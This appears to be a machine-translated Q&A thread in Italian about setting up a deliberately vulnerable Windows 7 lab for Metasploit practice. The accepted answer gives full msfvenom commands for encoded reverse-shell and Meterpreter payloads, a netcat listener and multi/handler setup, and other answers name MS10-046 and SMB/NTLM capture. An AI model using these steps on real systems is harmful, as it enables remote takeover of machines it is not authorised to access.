Installa un servizio vulnerabile per Windows 7

3

Ho una specie di progetto o dimostrazione, in cui devo sfruttare Windows 7 per ottenere una shell remota.

Ho eseguito una scansione delle vulnerabilità con nessus sulla mia macchina Windows 7, ma non ho trovato alcun tipo di vulnerabilità che mi consenta di raggiungere il mio obiettivo.

Quindi esiste un servizio vulnerabile che contiene un buffer sul flusso che posso installare sul mio computer Windows 7, e lo uso per sfruttare quel computer da remoto con metasploit.

Ulteriori informazioni:

  • La macchina che sto cercando di sfruttare è mia, quindi tutto è legale.

  • Sto usando Ubuntu 15.10 con l'ultima versione di metasploit (l'ho installato dai repository di kali).

posta Sidahmed 31.03.2016 - 16:33
fonte

3 risposte

0

Ho usato questa ftp vulnerabilità (@halfinformed me l'ha data nei commenti).

Ecco quindi i passaggi per installare e sfruttare con una semplice shell inversa:

  1. Installa il servizio vulnerabile dal link sopra indicato.
  2. Genera un nuovo carico utile che si adatta alle tue necessità (in base al tuo indirizzo IP) con questo comando msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=your_ip_address LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0d\x0a\x3d\x5c\x2f" -i 3 -f python .
  3. Sostituisci il carico utile nello script di exploit con il payload generato dal comando precedente (dalla riga 23 alla riga 55).
  4. Sostituisci l'indirizzo IP della vittima nello script di exploit (riga 61).
  5. Ascolta con netcat su un altro terminale con il comando nc -nlpv 4444 .
  6. Avvia lo script di exploit con python path_to_exlpoit_script.py .
  7. Vai al terminale dove hai lanciato nc, troverai una shell inversa che ti aspetta.

Se non vuoi sfruttare il payload meterpreter, devi modificare i passaggi 2 e 5:

  1. Genera il payload meterpreter che si adatta alle tue esigenze con questo comando msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=your_ip_address LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0d\x0a\x3d\x5c\x2f" -i 3 -f python .

  2. Ascolta con meterpreter su un altro terminale. Per fare ciò, apri metasploit e digita use exploit/multi/handler ; poi set payload windows/meterpreter/reverse_tcp ; poi set lhost your_ip_address ; poi %codice% ; finalmente set lport 4444 .

risposta data 07.05.2016 - 10:46
fonte
2

Partendo dal presupposto che il computer Windows 7 non ha bisogno di essere completamente aggiornato / aggiornato - si può guardare l'esecuzione di una copia vanigliata (senza aggiornamenti applicati) di Windows 7 con UAC (User Account Control) disabilitato e sfruttare MS10 -046.

MS10-046 è una vulnerabilità critica che potrebbe consentire a un potenziale utente malintenzionato di ottenere lo stesso livello di diritti utente dell'utente locale (dove la maggior parte dei joes medio utilizza un account con privilegi di amministratore). La vulnerabilità interessa sia le versioni a 32 bit che a 64 bit di Windows 7.

L'exploit si riferisce alla gestione dei file .LNK che ha la risorsa icona che punta a un file DLL (Dynamic Link Library) dannoso.

Senza sapere esplicitamente se ha bisogno di essere una vulnerabilità di buffer overflow - direi che questo dovrebbe fare il trucco, o allo stesso modo potresti usare una distribuzione come Metasploitable che è intenzionalmente lasciata vulnerabile.

    
risposta data 31.03.2016 - 17:14
fonte
0

Ci sono diversi exploit disponibili (come MS14-064) per Windows 7 fino a 8 e forse 10. Non tutti saranno applicabili come menzionato da @ 1ntgr

Puoi cercarli qui: link

Potresti voler indirizzare i programmi installati sulla macchina altrimenti. Fai riferimento a link

Altrimenti puoi sempre provare la famosa cattura SMB / NTLM ingannando la vittima per accedere al tuo server di destinazione.

PS: non potrei aggiungere più di 2 link qui, ma sentiti libero di darmi il mio nome @haxorhead.

    
risposta data 01.04.2016 - 06:00
fonte

Leggi altre domande sui tag